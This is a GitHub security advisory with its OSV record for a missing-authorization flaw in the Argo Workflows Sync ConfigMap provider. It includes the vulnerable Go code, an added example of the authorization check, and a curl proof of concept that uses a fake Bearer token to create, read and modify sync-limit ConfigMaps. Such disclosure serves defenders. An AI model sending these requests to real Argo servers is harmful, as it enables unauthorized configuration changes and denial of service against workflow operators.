GHSA-XCHC-CQWG-G76Q

Vulnerability from github – Published: 2026-05-04 20:00 – Updated: 2026-05-13 13:39
Summary
Argo has Missing Authorization in its Sync ConfigMap Provider
Details

Summary

The Sync Service's ConfigMap-backed provider (server/sync/sync_cm.go) performs no authorization check on any of its CRUD operations (create, read, update, delete). Every caller the Argo Server admits can therefore create, read, update, and delete the Kubernetes ConfigMaps that hold synchronization limits. With --auth-mode=server (the configuration used in the PoC below) the Server performs every Kubernetes call with its own service account and does not validate the supplied Bearer token, so a made-up token is enough.

Details

The ConfigMap-backed provider (server/sync/sync_cm.go) has no auth.CanI checks:

// sync_cm.go — UNPROTECTED
func (s *configMapSyncProvider) createSyncLimit(ctx context.Context, req *syncpkg.CreateSyncLimitRequest) {
    // NO auth.CanI check
    kubeClient := auth.GetKubeClient(ctx)
    configmapGetter := kubeClient.CoreV1().ConfigMaps(req.Namespace)
    // ... directly creates/updates ConfigMaps
}
  • server/sync/sync_cm.go — lines 23-155
  • All four SyncService endpoints: CreateSyncLimit, GetSyncLimit, UpdateSyncLimit, DeleteSyncLimit
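The guarded form of the provider, as an added example that is not Argo's own code and not the linked fix commit (whose exact signatures are not reproduced here). It shows the pattern the vulnerable snippet lacks: an access review for the calling subject runs before the ConfigMap client is touched on each of the four operations, so a denied caller causes no side effect. The AccessReviewer interface, the rbacReviewer allow-list, the in-memory store and the verb-per-endpoint mapping (create/get/update/delete on configmaps) are assumptions standing in for auth.CanI (a SelfSubjectAccessReview) and client-go:

```go
package main

import (
	"context"
	"errors"
	"fmt"
)

// Added example, not Argo's code. AccessReviewer, rbacReviewer and the
// in-memory store are assumptions standing in for auth.CanI (a
// SelfSubjectAccessReview) and the real CoreV1().ConfigMaps() client.

// AccessReviewer answers "may the caller perform verb on resource/name in ns?".
type AccessReviewer interface {
	CanI(ctx context.Context, verb, resource, ns, name string) (bool, error)
}

var ErrForbidden = errors.New("forbidden")
type subjectKey struct{}

// WithSubject attaches a validated caller identity to ctx; a context without
// one (the PoC's "fake-token" caller) carries no subject and is denied below.
func WithSubject(ctx context.Context, subject string) context.Context {
	return context.WithValue(ctx, subjectKey{}, subject)
}

// rbacReviewer is a constructed stand-in: a static allow-list keyed
// "subject|verb|resource|namespace". Anything not listed is denied.
type rbacReviewer map[string]bool

func (r rbacReviewer) CanI(ctx context.Context, verb, resource, ns, _ string) (bool, error) {
	subject, _ := ctx.Value(subjectKey{}).(string) // "" when no subject is set
	return r[subject+"|"+verb+"|"+resource+"|"+ns], nil
}

// SyncLimitRequest carries the fields used by the advisory's PoC requests.
type SyncLimitRequest struct {
	Namespace, CMName, Key string
	Limit                  int
}

// syncProvider keeps ConfigMap data in memory, keyed "namespace/cmName".
type syncProvider struct {
	reviewer AccessReviewer
	store    map[string]map[string]string
}

// authorize is the guard the unprotected provider omitted. It runs before any
// read or write, so a denied caller never reaches the store.
func (s *syncProvider) authorize(ctx context.Context, verb, ns, name string) error {
	ok, err := s.reviewer.CanI(ctx, verb, "configmaps", ns, name)
	if err != nil {
		return err
	}
	if !ok {
		return fmt.Errorf("%w: %s configmaps/%s in %s", ErrForbidden, verb, name, ns)
	}
	return nil
}

func (s *syncProvider) CreateSyncLimit(ctx context.Context, req SyncLimitRequest) error {
	if err := s.authorize(ctx, "create", req.Namespace, req.CMName); err != nil {
		return err
	}
	s.store[req.Namespace+"/"+req.CMName] = map[string]string{req.Key: fmt.Sprint(req.Limit)}
	return nil
}

func (s *syncProvider) GetSyncLimit(ctx context.Context, ns, cmName, key string) (string, error) {
	if err := s.authorize(ctx, "get", ns, cmName); err != nil {
		return "", err
	}
	v, ok := s.store[ns+"/"+cmName][key] // indexing a nil inner map is safe
	if !ok {
		return "", fmt.Errorf("sync limit %s/%s/%s not found", ns, cmName, key)
	}
	return v, nil
}

func (s *syncProvider) UpdateSyncLimit(ctx context.Context, req SyncLimitRequest) error {
	if err := s.authorize(ctx, "update", req.Namespace, req.CMName); err != nil {
		return err
	}
	cm, ok := s.store[req.Namespace+"/"+req.CMName]
	if !ok {
		return fmt.Errorf("configmap %s/%s not found", req.Namespace, req.CMName)
	}
	cm[req.Key] = fmt.Sprint(req.Limit)
	return nil
}

func (s *syncProvider) DeleteSyncLimit(ctx context.Context, ns, cmName string) error {
	if err := s.authorize(ctx, "delete", ns, cmName); err != nil {
		return err
	}
	delete(s.store, ns+"/"+cmName)
	return nil
}
```

The check is deliberately per-operation and per-namespace: a subject granted only create/get/update in one namespace cannot delete there or touch another namespace, which is the behaviour a SelfSubjectAccessReview against the caller's own credentials gives in the real server.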

PoC

Prerequisites

  • Argo Server running with --auth-mode=server
  • Port-forward: kubectl port-forward -n argo svc/argo-server 2746:2746

Step 1: Create Sync Limit (Fake Token)

curl -sk -X POST "https://localhost:2746/api/v1/sync/default" \
  -H "Authorization: Bearer fake-token" \
  -H "Content-Type: application/json" \
  -d '{"type": 0, "namespace": "default", "cmName": "test-sync", "key": "test-key", "limit": 5}'

Result: {"namespace":"default","cmName":"test-sync","key":"test-key","limit":5}

Verify ConfigMap was created in Kubernetes:

kubectl get configmap test-sync -n default
NAME        DATA   AGE
test-sync   1      74s

Step 2: Read Sync Limit (Fake Token)

curl -sk "https://localhost:2746/api/v1/sync/default/test-key?type=0&cmName=test-sync" \
  -H "Authorization: Bearer fake-token"

Result: {"namespace":"default","cmName":"test-sync","key":"test-key","limit":5}

Step 3: Update Sync Limit (Fake Token)

curl -sk -X PUT "https://localhost:2746/api/v1/sync/default/test-key" \
  -H "Authorization: Bearer fake-token" \
  -H "Content-Type: application/json" \
  -d '{"type": 0, "namespace": "default", "cmName": "test-sync", "key": "test-key", "limit": 999}'

Result: {"namespace":"default","cmName":"test-sync","key":"test-key","limit":999}

Verify the ConfigMap was actually modified:

kubectl get configmap test-sync -n default -o jsonpath='{.data.test-key}'
999

Impact

An attacker with network access to the Argo Server can:

  1. Denial of Service — Set sync limits to 0 or 1, blocking all parallel workflow execution
  2. Workflow Disruption — Modify existing sync limits to break running workflows
  3. Information Disclosure — Read ConfigMap data that may contain sensitive configuration
  4. Arbitrary ConfigMap Manipulation — Create/delete ConfigMaps in any namespace accessible to the server's service account

Related CVEs

  • CVE-2026-28229 (GHSA-56px-hm34-xqj5): Unauthorized access to WorkflowTemplate endpoints — same root cause (missing auth.CanI check)
  • CVE-2024-53862 (GHSA-h36c-m3rf-34h9): Archived workflow auth bypass — same pattern

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-workflows/v4"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42297"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-04T20:00:18Z",
    "nvd_published_at": "2026-05-09T04:16:25Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe Sync Service\u0027s ConfigMap-backed provider (`server/sync/sync_cm.go`) performs **zero authorization checks** on all CRUD operations (create, read, update, delete). Any authenticated user \u2014 including those using fake Bearer tokens \u2014 can create, read, update, and delete Kubernetes ConfigMaps containing synchronization limits.\n\n### Details\nThe ConfigMap-backed provider (`server/sync/sync_cm.go`) has no `auth.CanI` checks:\n\n```go\n// sync_cm.go \u2014 UNPROTECTED\nfunc (s *configMapSyncProvider) createSyncLimit(ctx context.Context, req *syncpkg.CreateSyncLimitRequest) {\n    // NO auth.CanI check\n    kubeClient := auth.GetKubeClient(ctx)\n    configmapGetter := kubeClient.CoreV1().ConfigMaps(req.Namespace)\n    // ... directly creates/updates ConfigMaps\n}\n```\n- `server/sync/sync_cm.go` \u2014 lines 23-155\n- All four SyncService endpoints: `CreateSyncLimit`, `GetSyncLimit`, `UpdateSyncLimit`, `DeleteSyncLimit`\n\n### PoC\n### Prerequisites\n\n- Argo Server running with `--auth-mode=server`\n- Port-forward: `kubectl port-forward -n argo svc/argo-server 2746:2746`\n\n### Step 1: Create Sync Limit (Fake Token)\n\n```bash\ncurl -sk -X POST \"https://localhost:2746/api/v1/sync/default\" \\\n  -H \"Authorization: Bearer fake-token\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"type\": 0, \"namespace\": \"default\", \"cmName\": \"test-sync\", \"key\": \"test-key\", \"limit\": 5}\u0027\n```\n\n**Result:** `{\"namespace\":\"default\",\"cmName\":\"test-sync\",\"key\":\"test-key\",\"limit\":5}`\n\nVerify ConfigMap was created in Kubernetes:\n\n```bash\nkubectl get configmap test-sync -n default\n```\n\n```\nNAME        DATA   AGE\ntest-sync   1      74s\n```\n\n### Step 2: Read Sync Limit (Fake Token)\n\n```bash\ncurl -sk \"https://localhost:2746/api/v1/sync/default/test-key?type=0\u0026cmName=test-sync\" \\\n  -H \"Authorization: Bearer fake-token\"\n```\n\n**Result:** `{\"namespace\":\"default\",\"cmName\":\"test-sync\",\"key\":\"test-key\",\"limit\":5}`\n\n### Step 3: Update Sync Limit (Fake Token)\n\n```bash\ncurl -sk -X PUT \"https://localhost:2746/api/v1/sync/default/test-key\" \\\n  -H \"Authorization: Bearer fake-token\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"type\": 0, \"namespace\": \"default\", \"cmName\": \"test-sync\", \"key\": \"test-key\", \"limit\": 999}\u0027\n```\n\n**Result:** `{\"namespace\":\"default\",\"cmName\":\"test-sync\",\"key\":\"test-key\",\"limit\":999}`\n\nVerify the ConfigMap was actually modified:\n\n```bash\nkubectl get configmap test-sync -n default -o jsonpath=\u0027{.data.test-key}\u0027\n```\n\n```\n999\n```\n\n### Impact\nAn attacker with network access to the Argo Server can:\n\n1. **Denial of Service** \u2014 Set sync limits to `0` or `1`, blocking all parallel workflow execution\n2. **Workflow Disruption** \u2014 Modify existing sync limits to break running workflows\n3. **Information Disclosure** \u2014 Read ConfigMap data that may contain sensitive configuration\n4. **Arbitrary ConfigMap Manipulation** \u2014 Create/delete ConfigMaps in any namespace accessible to the server\u0027s service account\n\n## Related CVEs\n\n- **CVE-2026-28229** (GHSA-56px-hm34-xqj5): Unauthorized access to WorkflowTemplate endpoints \u2014 same root cause (missing `auth.CanI` check)\n- **CVE-2024-53862** (GHSA-h36c-m3rf-34h9): Archived workflow auth bypass \u2014 same pattern",
  "id": "GHSA-xchc-cqwg-g76q",
  "modified": "2026-05-13T13:39:05Z",
  "published": "2026-05-04T20:00:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-xchc-cqwg-g76q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42297"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/commit/09fff05e0830c14a5e36cc40597ad84881db1ab6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/argoproj/argo-workflows"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/releases/tag/v4.0.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Argo has Missing Authorization in its Sync ConfigMap Provider"
}